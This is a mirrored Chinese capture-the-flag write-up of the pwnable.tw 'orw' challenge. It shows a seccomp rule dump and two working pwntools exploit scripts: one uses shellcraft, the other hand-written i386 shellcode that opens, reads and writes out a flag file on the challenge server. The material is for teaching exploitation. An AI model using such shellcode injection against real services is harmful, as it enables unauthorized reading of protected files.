19

Pwnable.tw orw writeup

 3 years ago
source link: https://bbs.pediy.com/thread-268091.htm
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client
Pwnable.tw orw writeup-Pwn-看雪论坛-安全社区|安全招聘|bbs.pediy.com
Pwnable.tw orw writeup
2021-6-15 15:39 1612

https://pwnable.tw/challenge/#2
图片描述

2.1 先看一下安全保护情况

➜ orw checksec ./orw
[*] '/mnt/hgfs/share/ctf/tw/orw/orw'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments

2.2 逆向

图片描述

2.2.1 seccomp沙箱保护

其中seccomp是一个开启内核system call保护的函数。通过这一函数可以划定程序准许用户态调用的系统函数,相当于划定白名单,即题目所言【仅开启了open、write、read】。
可以使用工具查看seccomp保护规则
https://github.com/david942j/seccomp-tools
安装方法
sudo apt install gcc ruby-dev
sudo gem install seccomp-tools
使用方法
➜ orw seccomp-tools dump ./orw

line CODE JT JF K

0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x09 0x40000003 if (A != ARCH_I386) goto 0011
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x07 0x00 0x000000ad if (A == rt_sigreturn) goto 0011
0004: 0x15 0x06 0x00 0x00000077 if (A == sigreturn) goto 0011
0005: 0x15 0x05 0x00 0x000000fc if (A == exit_group) goto 0011
0006: 0x15 0x04 0x00 0x00000001 if (A == exit) goto 0011
0007: 0x15 0x03 0x00 0x00000005 if (A == open) goto 0011
0008: 0x15 0x02 0x00 0x00000003 if (A == read) goto 0011
0009: 0x15 0x01 0x00 0x00000004 if (A == write) goto 0011
0010: 0x06 0x00 0x00 0x00050026 return ERRNO(38)
0011: 0x06 0x00 0x00 0x7fff0000 return ALLOW

2.2.2 shellcode

简单分析函数可知,该程序直接执行了用户输入的shellcode。结合题目意思,可以使用open函数打开flag文件,然后read读出文件内容,最后write输出到控制台。
使用的python程序如下:

from pwn import *
context(arch='i386',os='linux')
context(log_level='debug')
io = remote('chall.pwnable.tw',10001)
#https://docs.pwntools.com/en/stable/shellcraft.html
s = ''
s+=shellcraft.open("/home/orw/flag")
s += shellcraft.read('eax','ebp',0x100)
s += shellcraft.write(1,'ebp',0x100)
s += '''
\nnext:
jmp next'''
io.recvuntil(':')
io.send(asm(s))
io.interactive()

使用pwntools的shellcraft来构造shellcode。
图片描述
当然也可以自己写:前提是需要对系统调用的参数传递比较熟悉,eax为系统调用号,ebx,ecx,edx依次为传递的参数。

from pwn import *
context(arch='i386',os='linux')
context(log_level='debug')
io = remote('chall.pwnable.tw',10001)
#https://docs.pwntools.com/en/stable/shellcraft.html
s = ''
s+='''
/* open(file='/home/orw/flag', oflag=0, mode=0) */
/* push b'/home/orw/flag\x00' */
push 0x1010101
xor dword ptr [esp], 0x1016660
push 0x6c662f77
push 0x726f2f65
push 0x6d6f682f
mov ebx, esp
xor ecx, ecx
xor edx, edx
/* call open() */
push 5 /* 5 */
pop eax
int 0x80
'''
s += '''
/* read(fd='eax', buf='ebp', nbytes=0x100) */
mov ebx, eax
mov ecx, ebp
xor edx, edx
mov dh, 0x100 >> 8
/* call read() */
push 3 /* 3 */
pop eax
int 0x80
'''
s += '''
/* write(fd=1, buf='ebp', n=0x100) */
push 1
pop ebx
mov ecx, ebp
xor edx, edx
mov dh, 0x100 >> 8
/* call write() */
push 4 /* 4 */
pop eax
int 0x80
'''
s += '''
\nnext:
jmp next'''
io.recvuntil(':')
io.send(asm(s))
io.interactive()

2.2.3 运行成功的截图

[注意] 招人!base上海,课程运营、市场多个坑位等你投递!


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK